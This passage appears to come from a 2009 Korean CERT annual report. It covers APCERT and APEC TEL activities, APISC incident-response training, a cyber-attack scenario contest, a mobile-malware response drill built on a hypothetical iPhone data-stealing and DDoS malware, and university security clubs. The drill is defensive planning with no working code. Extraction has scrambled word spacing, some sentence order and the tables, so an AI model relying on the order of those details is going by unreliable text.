한국가를대표하는국가 CERT(National CERT), 비영리혹은정부가지원 하는기관또는 2개이상의정회원이인정하는선진침해사고대응팀으로 한정하고있다. 즉, 영리목적의 CERT및상업적목적의침해사고대응팀은 정회원이될수없으며일반회원으로가입하여활동할수있다. 정회원 승인심사는운영위원회에서논의하여결정한다. 정회원은운영위원선거의후보로진출할수있는자격및투표권을 가진다. 일부정회원은각국가별대표연락기관(POC) 으로활동하며, 주요 침해사고발생시외국회원기관의요청에성실히대응하는역할및의무를 가진다. 또한정회원은 APCERT 국제공동모의훈련에의무적으로참여 하여야한다. 참여하지않는경우에는적절한해명을하여야한다. 일반회원은아 태지역내침해사고대응관련전담기관으로 APCERT 정회원의후원을받아운영위원회의결정으로회원이될수있다.FIRST와 같이후원기관의현장실시가필수적이다. 일반회원에게는운영위원선거권 및피선거권이주어지지않는다. 일반회원에서정회원으로승격되기 위해서는일반회원이된지최소한 1 년이경과한후에지원할수있다. KrCERT/CC는운영위원자격으로APCERT 활동에적극적으로참여해 왔으며, 특히 2005 년, 2006년두차례 APCERT차원의국제공동모의훈련을 주도한바있다.2008년 3월에는홍콩에서개최된 APCERT 연례컨퍼런스에 참가하여운영위원으로재선된바있다. 3. APEC TEL 가.APECTEL39차회의 APEC TEL 39차회의는싱가포르에서4월13일부터18일까지 6일간의 일정으로개최되었다. - 150 -

정보보호관련워크샵으로는해저케이블보호정보교환워크샵, APEC OECD 공동안전한어린이인터넷환경조성을위한워크샵이개최되었다. 해저케이블보호정보교환워크샵은전세계국제통신의백본망으로서약 95% 를점유하고있는해저케이블은어로활동, 천재지변등에의해많은 피해가발생하고있어국가간, 사업자간정보교류가매우중요하다는것을 인식한기회였다. 케이블보호를위해케이블사업자간연안국별어민, 해양관계기관, 정부등상호간보호마인드고취및국제법적규제조항의 강화가필요하다. 불가피하게발생된해저케이블피해는그복구를위한 사전관련국허가기간이장기간소요되어좀더빠른복구가어려운점을 감안, 국가간특별한상호협조를통해서보다빠른작업허가를득할수 있도록상호/ 다자간협력증진시킬수있는방안필요하다. APEC-OECD 공동안전한어린이인터넷환경조성을위한워크샵에서는 APEC 각회원국의어린이를위한안전한인터넷환경조성에관한정책및사례발표가되었다. 보안번영운영그룹(Security and Prosperity Steering Group) 회의에서는 SPSG 주요활동경과보고와함께신규프로젝트제안및주요국정보보호 인식제고노력을소개하였다. 한국, 인도네시아의신규프로젝트제안을 승하였다. 또한한국, 대만등주요국의사이버보안인식제고활동을소개 하였다. 나.APECTEL40차회의 APEC TEL 40차회의는멕시코칸쿤에서9월24일부터 30일까지7 일간의 일정으로개최되었다. 정보보호관련워크샵은 SPSG 우선순위설정 워크샵이개최되었다. - 151 -

SPSG 우선순위설정워크샵은정보통신작업그룹(TEL WG) 의중장기 (3~5 년) 전략설정을위한운영그룹차원의노력으로, 전략설정과 2010년 10 월개최예정인통신장관회담(TEL MIN) 의선언문과행동계획의기초 자료로활용하기위해개최되었다. 이러한우선순위설정은회기간의지속적 논의를통해서작업그룹전략설정작업에기여하기위한목적이다. 회원체의 설문결과에기반하여다음의 SPSG 우선순위를다음과같이설정하였다. 첫째, 사이버보안에대한인식제고 ( 회원체의가장많은관심을받은항목), 둘째,APEC역내에서 SPSG 가전문가그룹으로서의역량구축, 셋째, 사이버 보안및사이버범죄에대한법적근거확보, 넷째, 국제협력강화이다. 보안번영운영그룹(SPSG) 회의에서는우리나라외교부가추진하는대테러 작업그룹(CTTF) 과정보통신작업그룹(TEL) 의공동프로젝트로제2차 APEC 하였다. 테러공격으로부터사이버공간의보호에관한세미나의승인획득 또한사이버보안의인식제고활동에대한전체회원체의관심이 높으며, 우리나라도프로젝트, 발표등을통해서인식제고활동에기여할 필요가있다. 4. 2009 National CSIRT Meeting( 국가침해사고대응팀회의) 2009 National CSIRT Meeting은일본교토에서7월4일부터5일까지 2일간의일정으로 70 여명이참석한가운데개최되었다. National CSIRT Meeting은미국 CERT/CC의개별적초청에의해자국을대표하는 CERT 들이모여서로의활동과침해사고대응방법의기술적인측면을심도 있게논의하고이를공유하는자리이다. 호주, 일본 CERT 는대용량악성코드수집, 행위분석시스템을개발 활용하고있다. 이시스템을활용할경우, 악성코드수집, 행위분석및 결과보고까지의시간이 10 분정도로단축된다. - 152 -

폴란드 CERT-Polska는동유럽주변국가에대한침해사고대응팀 (CERT) 국축및운영교육실시사례를공유하였다. 중국 CNCERT/CC는올림픽개최이후자국내인터넷서비스제공자 (ISP) 의침해사고신고의무를강화하기위해서 있는법이개정되어 2009 년부터시행된다고밝혔다. ISP로부터정보를수집할수 미국 US-CERT는 2003 년부터시작된정부부처, 산업분야별정보공유 분석센터(ISAC) 로부터네트워크트래픽정보를수집하여모니터링하는 아인슈타인프로젝트에대해서발표하였다. 많은침해사고대응팀(CERT) 이 TSUBAME 프로젝트에참여해줄것을요청하였다. - 153 -

제 4 절아 태정보보호교육(APISC 2009) 1. 추진배경 인터넷이전세계를하나의네트워크로엮고있듯이, 인터넷침해사고 또한전세계에걸쳐동시다발적으로발생하고있다. 있어서지리적요인은이제더이상제약조건이아니며, 사이버공간을통해지구촌은진정한 커뮤니케이션에 인터넷이라는 1 일생활권으로변모하고있다. 그러나현재인터넷공간은그특유의개방성으로인해바이러스, 웜, bot, 스팸메일등온갖유해성데이터로가득차있으며, 이는지구촌이 진정한글로벌사회가되기위하여불안정하며과도기적인수단으로서 인터넷이존재한다고생각된다. 작금의온갖인터넷침해사고는전세계국가들로하여금침해사고예방및대응의중요성을날로일깨워주고있으며, 국가와국가간의협력이무엇보다중요한분야임은항상강조해도지나치지않다. 아울러자국이관리하는네트워크를보호하고발생하는침해사고에신속히대응할수있는능력을갖추는것이무엇보다필요하다. ASEAN 회원국및 APEC 회원국들이침해사고대응팀을구축하여국가간침해사고에대응할수있는역량을갖추게되면한국을포함한아태 권역의침해사고대응능력은아울러향상될것이다. 개발도상국들은아직인터넷인프라가잘발달되지않았음에도불구하고그역량을갖추는것이중요하다는인식을하고있지만, 자원과전문지식의부족으로인해자칫침해사고대응팀구축에소극적인자세를가질수있다. 이러한아 태권역내개발도상국들로하여금침해사고대응팀구축을 활성화시키고, 그들의역량강화를지원하기위해개발도상국의정보보호 - 154 -

및 IT 전문가를초청하여아 태정보보호교육과정을실시하였다. 2. 아태 정보보호교육과정수행결과 아태정보보호교육과정 (2009 APISC Security Training Course) 은5월 11일부터 15일까지 5 일간명동이비스(ibis) 호텔에서개최되었다. 교육 과정에는총 20개국 26 명이참여하였으며, 교육생은아태지역국가및 개발도상국 17개국에서 21 명이참석하였다. 아 태정보보호교육과정의 원활한진행을위해미국과호주에서 4 명의강사를초빙하였다. 첫째날(5월 11 일) 에는진흥원과한국의정보보호현황전반에대해소개 하면서한국의정보보호에대한노력과성과에대해설명하여침해사고 대응분야뿐만아니라, 정보보호분야전체를이해할수있는기회를제공 하였고, 한국의 IT 발전상을체험하기위해구로디지털단지소재롯데 정보통신상황관제시스템실과대응센터를견학하는기회를제공하여참가자 들에게한국이선진수준의 하였다. IT 및정보보호역량을 보유하고있음을과시 둘째날(5월 12 일) 에는참석자들이자기소개를하고, 교육참석자의 국가별정보보호현황에대한발표자료를자발적으로발표하였으며, 각국가의법률및제도의차이에대해서토론을통해서로의경험을 공유하는정보교류의시간을가졌다. 셋째날(5월 13 일) 에는침해사고대응팀구축 운영정규교육과정인 TRANSITS(Training of Network Security Incident Teams Staff) 를활용 하여침해사고대응팀의조직분야(Organizational Module), 운영분야 (Operational Module) 및법률분야(Legal Module) 에대해서설명하였다. 침해사고대응팀의개념, 구축및운영시의고려사항, 침해사고대응관련 법률적고려사항등의내용을설명하였다. - 155 -

넷째날(5월 14 일) 오전에는침해사고대응팀구축 운영에관한비즈니스 차원의사례를가지고 5~6명으로그룹을만들고서로의사례를토론하고 발표하는시간을가졌다. 오후에는기술분야(Technical Module) 에대한 내용을설명하였다. 다섯째날(5월 15 일) 에는 Advisory Module 및각그룹과그룹이역할에 따른시뮬레이션실습을하였다. 특히시뮬레이션실습은강사의능력과 교육생의참여도가무엇보다도필요한시간으로, 교육생들의참여도가돋보였던시간이었다. 그어느때보다도 가상침해사고시나리오를 바탕으로다양한대응방법에대해토론하여문제를해결하는시간으로, 교육생들에게체험이라는소중한경험의기회를주기위함이며, 교육에대한평가시이부분에대한만족도가가장큰것으로나타난다. 실제로 TRANSITS 교육과정은강사의일방적인강의보다는실제사례를제시하고해결방안에대해서집단으로과제를토론하여해결하는방식으로진행하기때문에참석자와의계속적인의견교환과토론및발표를통한교육참여자의적극적인참여를강조한다. 이와같은자유로운분위기는교육참여자간의경험과전문지식을교육의일부로이끌어내는효과를가져왔으며, 교육참여자의만족도를높이는효과도있었다. 전체교육일정은아래와같다. - 156 -

- 157 -

( 그림 4-1) TRANSITS 교육과정일정 3. 시사점및향후계획 아태 정보보호교육과정은한국이국제침해사고대응에선도적인 역할을하고있고, 개발도상국의침해사고대응능력을높이기위한교육 지원을하고있다는사실을알리는계기이다. 아 태정보보호교육과정은 - 158 -

개발도상국및아태지역국가에침해사고대응팀구축및운영기술을 전수하는기회이며, 좋은계기이다. 침해사고대응관련한국의국제적위상을강화하는 2005년부터 2008년까지 4회의성공적인 APISC 교육결과를바탕으로, 금년에는몽골, 통가등중앙아시아국가및태평양지역국가들로 그대상을확대하여교육기회를제공하였고, 보다많은교육생을배출 하여한국의국가정보보호위상을제고하였다. 2009 년에는특히몽골, 미얀마, 아프가니스탄, 피지, 파푸아뉴기니, 통가등교육대상국가의범위가예전보다한층확대되어참석자들간 네트워크구축에큰의미를두고있으며, 향후협력관계구축에큰기여를 할것으로보인다. 2009 년교육결과를바탕으로향후에는보다많은개발도상국에교육의 기회를제공하고협력체계를구축해나갈수있도록교육대상국가를 확대하여, 실질적인아 태정보보호센터의범위를확장하는계기를마련해야 할것이다. ( 그림 4-2) 참석자기념촬영(5/11) - 159 -

o2009apisc 아태 정보보호교육참가자명단 # Economy Affiliate Department Name 1 Afghanistan MCIT Information and Data Technology 2 Bangladeshi BDCERT Bangladeshi Computer Emergency Response Team Wali Mohammad BARJESTA Mohammad Fakrul ALAM 3 Bhutan DIT Department of Information Technology Hemlal SUBEDI 4 Cambodia NIDA National ICT Development Authority Solyda SOK 5 Fiji (Tongan) SOPAC Pacific Islands Applied Geoscience Commission Siaosi SOVALENI 6 Fiji(Tongan) USP University of South Pacific Kisione Wesley FINAU 7 India CERT-In Indian Computer Emergency Response Team Indonesia Security Incident Response Team 8 Indonesia ID-SIRTII of Internet Infrastructure 9 Indonesia MCIT Ministry of Communication and Information Technology Sani ABHILASH MIZAMIL WIJAYANTO 10 Kyrgyz PDR NIT National Information Technology Nurbek DOSMAMBETOV 11 Japan JPCERT/CC Yong-shi LIN 12 Mongolia MonCIRT Mongolia Cyber Incident Response Team Esbold UNURKHAAN 13 Mongolia ICTPA Information Communications Technology and Post Authority Myanmar Computer Emergency Response 14 Myanmar mmcert/cc Team 15 Pakistan NR3C 16 Pakistan NTC 17 Papua New Guinea National Response Center for Cyber Crimes National Telecommunications Corporation, Government of Pakistan Papua New Guinea Radiocommunications &TelecommunicationsTechnicalAuthority 18 Philippines Civil Service Commission 19 Sri Lanka SLCERT Sri Lanka Computer Emergency Response Team Enkhbayar SUNDUI Khin Swe HTAY Ammar JAFFRI Miraj GUL Ronald TOMAUSI Laudemer Gelito SOLIDUM Nilusha Dilani GUNATHILAKE 20 Tonga Ministry of Finance & National Planning Alfred MA'AKE SOAKAI 21 Viet Nam VNCERT Viet Nam Computer Emergency Response Teams Ha Hai THANH 22 Australia AusCERT Robert G. LOWE 23 USA Juniper Networks SIRT James N. DUNCAN 24 USA Cisco Susan R. RAILTON 25 USA FIRST Educational Committee Arnold S. YOON 26 Korea KISA KrCERT/CC Jinhyun CHO - 160 -

제 5 절사이버가상시나리오공모전 1. 개요 대응센터는향후발생가능한사이버공격의유형을예상해보고, 그에 대한대응방안을모색하기위해 사이버공격가상시나리오공모전 을 개최하였다. 이시나리오공모전은해킹등사이버공격에대한전문적 지식이있는대국민을대상으로공모전을통해 77 DDoS 공격이후 실현가능한사이버공격시나리오들을도출하고, 이에대한심도깊은 대응방안을마련함으로써보다지능화되고있는사이버위협에대한 선제적대응및대국민보안의식제고에기여하였다. 2. 세부진행내용 o 접수기간 : 2009. 10. 7( 수) ~ 11. 22( 일) o 접수시나리오 : 총 19편 - DDoS 관련시나리오가가장많이접수(9 건), 사이버전쟁(7 건), 인터넷 뱅킹(2 건), 스마트폰(1 건) - 학교( 학생) 8 건, 회사( 기관) 4 건, 개인 7건 o 19개응모작중1 차평가(11/25, 수요일로 ) 7 개시나리오를선별, 2차 최종평가(12/1, 화요일) 에서순위선정 1 차평가 : 진흥원및외부실무전문가, 2 차평가 : 정책입안자급외부전문가 - 161 -

[ 표 4-3] 최종평가결과 제출기관제목분야순위 단국대 충남대스마트팀 P2P BOT을이용한집중서비스거부공격 DDoS 우수상 부자되는해커의신무기스마트폰스마트폰우수상 개인 자기증식인공지능공격코드와기법을이용한코드제어 DNS 터널링 사이버테러 ( 무선랜) 장려상 안철수연구소 / 신종악성코드확산기법을이용한 VoIP 환경에서의텔레뱅킹위협 인터넷뱅킹 장려상 서울산업대 TTL변조를통한 Agent 대응방안 서비스거부공격분석과 DDoS 장려상 3. 활용계획 제출된시나리오를심층검증해대응시나리오개발및모의훈련, 사용자교육, 홍보영상작성등에활용추진할계획이다. - 162 -

제 5 장침해사고대응역량강화 제 1 절국내모바일침해사고공동대응훈련실시 1. 모바일악성코드공동대응모의훈련 가. 개요 대응센터에서는지난해에이어국내스마트폰활성화의예상에따른해외모바일악성코드유입및신종발생시위협으로부터국내이동통신망사용자들을보호하고피해확산을방지하기위한예방차원에서의유관기관과의모의훈련을실시및공조대응체계를점검하였다. 특히, 국내아이폰사용자의증가와해외에서이를대상으로하는모바일악성코드의연이은발생에따라주요보안이슈로대두되어이에대한대응훈련에중점을두었다. (1) 목적 o 국내모바일악성코드출현대비진흥원과유관기관간대응체계점검 o - - 대응센터내부대응체계점검 유관기관역할및대응상황점검 침해사고대응관련센터각팀별고유역할점검 - 상황실근무인력의모바일악성코드침해사고발생에대한대응능력 - 향상 ( 모바일악성코드유포지차단대책등) 국내백신업체의신속한모바일백신패턴업데이트및전용백신 개발필요성시사 - 이동통신망침해사고발생에대한유관기관의적극적, 대응체계확인 능동적인 - 모바일악성코드로인한침해사고발생시국내이동통신사, 백신 - 163 -

업체등유관기관간비상연락체계점검 (2) 일시 : 2009. 12. 21( 월), 14:00 ~ 16:00 (3) 참여기관 o 한국인터넷진흥원인터넷침해대응센터 (KISC) o 국내이동통신사 (KT) KT는국내아이폰의판매및유통을담당하고있음 o 국내백신업체 ( 안철수연구소) 나. 훈련내용 (1) 시나리오 1 < 가정 1> Apple 社의아이폰에서동작하는모바일악성코드가해외특정사이트로 부터정상적인응용프로그램으로가장하여다운로드되고있음 - 해당모바일악성코드에감염되는경우, 아이폰내개인정보중전화 번호부와문자메시지일체를해커가구축한사이트로전송하고멀티미디어 메시지, 사진, 일정관련자료를삭제하고, Apple 社홈페이지에대한 DDoS 공격을수행함 - 문제의모바일악성코드는 Apple 社공식다운로드사이트가아닌곳으 로부터전송되며 JailBreak 를적용한아이폰을대상으로전파를시도함 JailBreak 는아이폰의 Firmware( 펌웨어를변경하여정식다운로드 ) 사이트가 아닌곳으로부터아이폰用무료응용프로그램을다운로드할수있도록변경 가능 - 해당악성코드는 iphone Navigator 라는이름으로다운로드되고있으나 다른이름으로변경되어전파되고있음 - 164 -

( 그림 5-1) iphone Navigator iphone Navigator : 악성행위를유발하는아이폰응용프로그램 < 가정 2> 현재, 미국일부지역, 프랑스등지에서는금번모바일악성코드에의한 피해신고가증가하고있으며국내에서도피해사례가접수되고있음 국내의한이동통신사업자는 Apple 社와협약을체결하여판매를담당하고 있으며약 100만명2) 정도의사용자가있는것으로파악되어피해확산을 방지하기위한대응이필요함 사건시나리오 #1 : 국내이동통신사및백신업체고객지원센터에서는아이폰사용자들이자신의개인정보가삭제되고있다는민원접수가증가함을인지하여모바일악성코드에의한현상으로파악, 해당내용을대응센터상황실로통보함 사건시나리오 #2 : 민원접수가증가하는상황과함께 Apple 社에대한 DDoS 공격이진행중인상황에대한정보를해외 CERT 에서전달되어 두사건의연관성분석이필요함 2) 시나리오상의아이폰사용자수치는훈련을위한가상수치임 - 165 -

( 그림 5-2) 아이폰악성코드전파로인한피해시나리오 1 해커는아이폰사용자의정보를수집하기 4 악성코드에감염된아이폰에서무선랜으로 위해악성코드제작및개인정보수집 연결된주변기기들의포트를스캐닝하여 사이트를구축한다. 보안이취약한(JailBroken) 아이폰을 검색한후아이폰악성코드를감염시킨다. 2 아이폰사용자는 JailBreak 도구 사이트에접속, 다운로드한다. 5 감염된아이폰내부의개인정보를 기구축된해커가구축한사이트로전송 하고멀티미디어메시지, 사진및 일정관련데이터를삭제함 3 사용자는 JailBreak 도구를실행하여 아이폰을변형시킨후특정한 응용프로그램( iphone Navigator") 을 다운로드하여설치한다. 6 특정사이트에대한다량의트래픽을유발시켜사이트접근장애초래 시나리오에서는 Apple 사를대상으로공격하는상황을가정함 - 166 -

상세 1 유선전화, 이메일등을이용하여이동통신사, 백신업체측으로 훈련이개시되었음을알림 2 이동통신사에긴급상황전파( 문) 를발송하여현상황에대한피해현황 파악및대응방안요청( 상황실) 현재무선인터넷트래픽중 Apple 社에대한트래픽증감현황파악요청 3 긴급상황전파( 문) 수신후 Apple社로접근되는최근 3일이내의 트래픽증감현황을파악하고, 현황을조사 ( 훈련참여이통사) 고객지원센터에접수된아이폰피해 - 피해를신고한사용자들의아이폰을조사한결과최근공통적으로 동일한프로그램을다운로드및실행했던것으로조사됨 훈련시나리오상해당프로그램은 iphone Navigator" 이며고객아이폰에는 공통적으로 JailBreak 가적용된상태임 -Apple 社접근트래픽 ( 최근 3 일이내) 증감추이와고객아이폰으로부터 추출된정보를대응센터상황실로전달 4 대응센터상황실에서는아래와같이긴급업무협조요청실시 - 이동통신사로부터전달받은정보를이용악성행위를유발하는응용 프로그램을입수하고코드분석팀에분석요청실시 5 코드분석팀에서해당샘플을분석한결과 - [ 악성행위 #1] 아이폰내개인정보( 전화번호부, 메시지등) 를원격지로 전송하고멀티미디어메시지, 사진및일정자료를삭제 훈련시나리오상해당프로그램은 iphone Navigator" 이며고객아이폰에는 공통적으로 JailBreak가적용된상태임 - [ 악성행위 #2] 동일한무선랜영역에대한포트스캐닝을한후특정포트 - 167 -

(SSH) 로접근을시도하는것이확인되며, 무선랜을통해서 Apple사의 홈페이지에주기적인연결시도를수행 훈련시나리오상해당프로그램은무선랜(Wi-Fi) 을이용하여 DDoS 공격을 수행 6 코드분석팀은해당모바일악성코드에대한정보를대응센터상황실, 훈련 참여이동통신사업자및백신업체에전달하여, - [ 백신업체] 감염단말기치료를위한전용백신제작의뢰 자사유선홈페이지에관련내용을별도로공지하여피해주의당부 - [ 이동통신사업자] 자사아이폰사용자들에게긴급 SMS 메시지( 정보보호 알림이) 를발송하여現상황에대하여피해주의공지 자사유선홈페이지에관련내용을별도로공지하여피해주의당부 7 대응센터상황실에서는피해사이트(Apple 社 ) 의정상적인운영을지원하기 위해예방및대응이필요한것으로판단, - 경보실무협의회를소집하여현상황에대한대응방안협의 - 모바일악성코드유포사이트에대한차단을각 ISP 업체에의뢰 훈련시나리오상 iphone Navigator 를다운로드하는곳으로파악된 사이트에대한임시차단을실시하고해당사이트의조치가완료된후 차단을해제 8 훈련참여백신업체는피해유발아이폰악성코드에대한전용백신을 신속하게개발하여대응센터상황실로전달 9 대응센터상황실은 - 백신업체로부터전달받은아이폰전용백신을훈련참여이동통신사에 전달하여등재하고사용자에게공지해줄것을요청 이용자보호팀은아이폰악성코드전용백신사용안내를포함한 대국민언론보도자료작성후훈련본부보고 - 168 -

Ⴊ 본훈련에참여하는관련기관들은 - KrCERT, 이동통신사, 백신업체및 Apple Korea의홈페이지에 해당아이폰악성코드에대한전용백신, 악성코드유포에따른피해 주의등에대한공지문게재 훈련종료선언 다. 훈련결과및향후계획 최근아이폰악성코드의빈번한발생에따른모바일악성코드위협 증가에대비하여적절한모의훈련시나리오를선택했으며최근 발생한악성코드는 JailBreak를적용한아이폰을대상으로동작하며 이를모의훈련시나리오에반영하여현실성을증가시킴 지난 09년 11월한달간 3 종류 (Ikee, iphone/privacy, Duh Worm) 의아이폰악성 코드가발생 라. 향후계획 o 다양한개방형모바일플랫폼에서의발생가능한침해사고유형을분석하여이를기반으로다양한침해사고시나리오를개발및차후모의훈련에적용필요 o 실질적인모바일악성코드출현시체계화된샘플수집프로세스마련등모의훈련시가장이슈가될수있는샘플채집에대한명확한체계의구성필요 현재상황에서는샘플채집의가능성을고객접점단에위치한이동통신사, 단말기제조사또는백신업체의고객지원센터로고려 o 신속한대응을위하여이동통신사의단말기의특정서비스를제한시키는방식이용제안 - 이동통신사업자에서제한적인서비스형태로제공되는 MDM(Mobile Device Management) 기능을이용하여단말기의원격제어를통한침해사고완화시나리오계획 - 169 -

해당기능의이용과관련해서는이동통신사업자의서비스이용에대한사전협의필요 - 향후, 모바일악성코드공동대응훈련의시기조절또는대응센터의정규훈련내용으로종속시켜전사적인방향으로공동대응모의훈련기반마련필요 - 170 -

제 2 절대학정보보호동아리지원 1. 추진배경 대학생들에게올바른정보보호가치관을인식시키고, 다양한정보보호 교육및세미나, 연구활동등을통해정보보호전문성을갖추고사회에 참여할수있도록 대학정보보호동아리지원사업 을추진하였다. 2. 대학정보보호동아리지원사업 참여동아리현황 2009 년 대학정보보호동아리지원사업 에참여할동아리선정(2 월) 을 위해내 외부심사위원회를구성하여본사업에참여할우수하고잠재력 있는 35 개정보보호동아리를선정하였다. [ 표 5-1] 대학정보보호동아리지원사업참여동아리현황 권역구분 서울 / 경기 / 강원 권역 영남 권역 충청 권역 호남 권역 소속대학( 동아리명) 강원대학교(Neriff), 경원대학교(Defender), 경희대학교(N.E.T), 국립경찰대학(CRG), 단국대학교(Aegis), 단국대학교(RedBeanZ), 서울여자대학교(SWING), 성균관대학교( 시스템컨설턴트), 성균관대학교(CLS), 세종대학교(S.S.G), 숙명여자대학교(SISS), 숭실대학교(ACK), 인하대학교(IGRUS), 인하대학교(mod777), 한국항공대학교(Intrusion Defence Team), 한양대학교(ICEWALL) 경북대학교( 정보보안연구회), 경일대학교(KICOM), 동명대학교(Think), 동서대학교(CNSL 연구회), 부경대학교(CERT-IS), 영남대학교(@Xpert), 인제대학교( 돗- 가비), 창원대학교(Casper) 순천향대학교(Hedgehog), 순천향대학교(Security First), 중부대학교(S.C.P), 충남대학교( 아르고스), 한서대학교(H.I.S.L), 호서대학교(ISLAB), 홍익대학교(HUST) 원광대학교(S.G.I), 전남대학교( 정보보호119), 전북대학교(IS), 조선대학교 (HackerLogin) 동아리수 16 8 7 4 총 35-171 -

3. 주요운영현황 동아리학생들의다양한수준을고려한맞춤형교육프로그램을개발하여실시하였고, 각종경진대회를통해우수동아리에게는해외컨퍼런스참가를지원하는등정보보호동아리의기술력향상을위해서노력하였다. 특히 2009년에는동아리역량강화를위한동아리별특화된연구 프로젝트를추진하여분야별전문성을강화하였으며, 대학생들이전문적인 지식및올바른정보호호윤리의식을가지고사회에참여할수있도록 하기위하여기술교육과소양교육을제공하는등다양한지원활동을수행 하였다. 가. 선정동아리증서수여식및회장단워크숍개최 대학정보보호동아리지원사업대상동아리에증서수여식및 09년도 주요추진사업에대한사업설명회를위해회장단워크숍(2월 26일~27 일) 을 개최하였다. 총 35개동아리에서동아리대표등 41명이참석한이번워크숍에서는 동아리의자발적인참여를유도하기위하여대학정보보호동아리연합회 (KUCIS) 운영진을선발하였고, 실습교육 세미나 정보보호경진대회등연간추진할 사업에대한세부계획을수립하였다. 나. 침해사고정보공유활성화및연구활동지원 (1) 동아리별특화된전문성강화를위한정보보호프로젝트추진 동아리역량강화를위하여동아리별특화된프로젝트를추진하도록하였으며, 프로젝트성과에대해평가를함으로써양질의산출물이 - 172 -

나올수있도록유도하였다. 총 33 개동아리에서프로젝트를수행하였으며, 국립경찰대 CRG에서 수행한 윈도우레지스트리에대한포렌식관점으로분석 에대한 프로젝트가윈도우레지스트리에대해깊이있는연구가체계적으로 이루어졌다는평가를받아우수프로젝트로선정되었다. (2) 정보보호정책아이디어공모전 인터넷최강국( 인터넷인프라, 기술, 산업등측면), 인터넷정보보호 최강국 으로의도약및급속한정보보호환경변화에따른참신한정책과제 발굴및바람직한정책방향모색을위하여정보보호정책아이디어공모전을 3 월에개최하였으며, 총 31개동아리에서 129 개제안서가접수되었다. 참신한아이디어가많이제시된이번공모전에서는 창원대 Casper 가 최우수상을수상하였으며, 우수상에 국립경찰대 CRG, 부경대 CERT-IS', 장려상에 성균관대시스템컨설턴트, 경북대정보보안연구회, 경원대 Defender' 가수상하였다. (3) 대학정보보호동아리컨퍼런스개최 제6회해킹방어대회개최시대학정보보호동아리를위한세미나및간이 취업박람회를개최하여정보보호전문가및전국대학정보보호동아리간 정보교류활성화를도모하고자대학정보보호동아리컨퍼런스 (5월 13일 ~14 일) 를 개최하였다. 컨퍼런스 1일차에서는 KUCIS 동아리대상으로선정된 8개주제발표가 진행되었으며, 정보보호특기병으로입대방법 에대한기무사발표및 동아리출신선배의초청강연등정보교류의장이이루어졌다. 또한 2일차에서는 IT 기업의인재상및건전한정보문화와사이버범죄 등에대한국내외전문가초청강연및간이취업박람회등다양한행사가 이루어져대학생들로부터높은관심과호응을얻었다. - 173 -

(4) 정보보호경진대회개최 2006 년부터개최해오던 'S/W 보안취약점찾기대회 를 오픈소스발굴 및 정책아이디어제안 등총 3 개분야로확대하여정보보호경진대회 (8월 17일 ~ 9월 7 일) 를개최하였다. 이번경진대회는대학정보보호동아리의전문성을향상시키고, 잠재적인 공격위협이될수있는 S/W 보안취약점에대한사전예방의기회를마련 하며, 정보보호전문가들이유용하게활용할수있는오픈소스( 공개S/W) 등을발굴하기위함이다. 본대회에서는전남대학교' 정보보호119', 부경대학교'CERT-IS', 동명 대학교 'Think' 동아리가각분야별최우수상을수상하였으며, 최우수 3개 동아리(6 명) 에대해 10월 5일부터 8일까지말레이시아에서개최된국제 보안컨퍼런스(HITB : Hack In The Box) 참가를지원하여신기술습득의 기회를제공하였다. (5) 동아리대상기술문서공모추진 동아리간정보보호기술정보교류확대및연구의욕을고취시키고자 3월에서 10 월까지각동아리에서연합회웹사이트를통해침해사고기술문서, 취약점분석보고서등을제출하도록하였으며, 총 13개동아리에서 57건의 보고서를제출하였다. 정보보호전문가의검증을통해 5건의보고서가우수보고서로채택 되었으며, 별도의포상및 12월에개최된워크숍에서발표할수기회를 제공하였다. (6) 도서구매및정보보호전문가(SIS) 자격증취득지원 금년도지원사업에참여한 35개동아리에정보보호연구활동에필요한 국내 외정보보호관련서적및소프트웨어를구입하여지급하였다. - 174 -

또한지원동아리소속회원에대해서는국가공인자격인정보보호전문가 (SIS) 자격시험응시료 30% 할인혜택을제공하고, 지난해우수동아리상위 3 개팀( 동명대 Think, 전남대정보보호119, 영남대 @Xpert) 회원에대해서는 응시료전액면제혜택을부여함으로써 전문인력양성기회를마련하였다. SIS 자격증활성화도모및우수 다. 정보보호최신기술교육및세미나개최지원 (1) 최신정보보호기술습득을위한정보보호실습교육실시 동아리회원들이다양한수준을고려하여해킹이나악성코드등각종 침해사고에대응할수있는실무지식을갖추도록 웹해킹및대응기법, 네트워크프로토콜보안및솔루션운영, 침해사고대응및분석기술, 취약점진단및위험분석기술 등 4 개교육과정을개설하여운영하였다. 체계적이고전문적인교육추진을위해정보보호전문교육기관활용및 방학기간을이용하여권역별( 서울/ 경기/ 강원, 영남, 호남, 충청) 로추진 함으로써교육의효과를극대화하였으며, 과목별 4일교육과정으로편성 하여총 13 회교육을실시하였다. 과목별주요내용은다음과같다. o 웹해킹및대응기법 : 웹어플리케이션의동작원리를이해하고웹상에서발생가능한취약점에대한대응방법을학습 o 네트워크프로토콜보안및솔루션운영 : 네트워크취약점으로인해 발생하는공격을차단하는침입차단시스템(Firewall) 과네트워크공격을 탐지하는침입탐지시스템(IDS) 의동작원리와네트워크상에서의기능 및특징에대해서이해하고운영 관리방법에대해학습 o 침해사고대응및분석기술 : 시스템침해사고발생시신속히대처하기위하여분석절차와방법및악성코드분석을위한리버싱기법에대해서학습 - 175 -

o 취약점진단및위험분석기술 : 정보보호에대한기본적인개념및 현업에서수행하고있는보안컨설팅방법론에대해서학습하고, 실습을 통해업무이해및향후진로결정에도움이될수있도록학습 [ 표 5-2] KUCIS 회원대상실습교육(4 일과정, 총 13 회) 회차일정장소참석현황 1 7.06 ~ 7.09 2 7.07 ~ 7.10 3 7.13 ~ 7.16 4 7.14 ~ 7.17 5 7.27 ~ 7.30 6 7.28 ~ 7.31 7 8.03 ~ 8.06 8 8.04 ~ 8.07 9 8.10 ~ 8.13 10 8.11 ~ 8.14 11 8.17 ~ 8.20 12 8.18 ~ 8.21 13 8.24 ~ 8.27 조선대학교홍익대학교조선대학교한서대학교충남대학교세종대학교세종대학교동명대학교경북대학교세종대학교인제대학교성균관대학교세종대학교 호남권역 4개동아리 27명참석 (4개동아리26 명수료) 충청권역 6개동아리 21명참석 (6개동아리19 명수료) 호남권역 5개동아리 24명참석 (4개동아리20 명수료) 충청권역 4개동아리 16명참석 (4개동아리14 명수료) 충청권역 4개동아리 12명참석 (2개동아리9 명수료) 서경강권역 13개동아리 34명참석 (13개동아리28 명수료) 서경강권역 12개동아리 28명참석 (10개동아리22 명수료) 영남권역 6개동아리 32명참석 (6개동아리31 명수료) 영남권역 8개동아리 31명참석 (8개동아리28 명수료) 서경강권역 11개동아리 26명참석 (10개동아리19 명수료) 영남권역 6개동아리 30명참석 (6개동아리24 명수료) 서경강권역 13개동아리 